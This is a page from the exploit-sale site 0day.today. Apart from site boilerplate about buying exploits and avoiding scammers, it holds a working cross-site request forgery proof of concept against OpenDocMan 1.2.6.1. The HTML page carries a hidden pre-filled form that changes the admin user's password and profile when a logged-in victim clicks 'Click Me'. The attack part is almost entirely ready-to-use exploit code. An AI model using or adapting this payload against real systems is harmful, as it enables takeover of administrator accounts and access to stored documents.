0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
OpenDocMan v1.2.6.1 Password Change CSRF
# Exploit Title: OpenDocMan Password Change CSRF # Date: 22/08/2012 # Exploit Author: Shai rod (@NightRang3r) # Vendor Homepage: http://www.opendocman.com/ # Software Link: https://github.com/downloads/opendocman/opendocman/opendocman-1.2.6.1.tar.gz # Version: 1.2.6.1 #Gr33Tz: @aviadgolan , @benhayak, @nirgoldshlager, @roni_bachar <html> <head> <title>OpenDocMan v1.2.6.1 Password Change CSRF</title> </head> <body> <pre> About the Application: ====================== OpenDocMan is a free, open source web-based PHP document management system (DMS) designed to comply with ISO 17025 and OIE standard for document management. It features web based access, fine grained control of access to files, and automated install and upgrades. Vulnerability Details: ====================== OpenDocMan is vulnerable to a CSRF which allows an attacker to change users password and profile details. In order to change user details the attacker must know the user id, for example; the default id for the "admin" user is 1. The victim must be logged in while clicking the malicious link. <center> <h2>Change Admin Password</h2> </center> </pre> <center> <form action="http://10.0.0.12/open/user.php" method="POST" enctype="multipart/form-data"> <input type="hidden" name="caller" value="/open/profile.php" /> <input type="hidden" name="id" value="1" /> <input type="hidden" name="last_name" value="Admin" /> <input type="hidden" name="first_name" value="Admin" /> <input type="hidden" name="username" value="admin" /> <input type="hidden" name="phonenumber" value=" " /> <input type="hidden" name="password" value="qwe123" /> <input type="hidden" name="Email" value="admin@example.com" /> <input type="hidden" name="department" value="1" /> <input type="hidden" name="admin" value="1" /> <input type="hidden" name="department_review[]" value="1" /> <input type="hidden" name="set_password" value="0" /> <input type="hidden" name="submit" value="Update User" /> <input type="submit" value="Click Me" /> </form> </center> </body> </html> # 0day.today [2024-11-15] #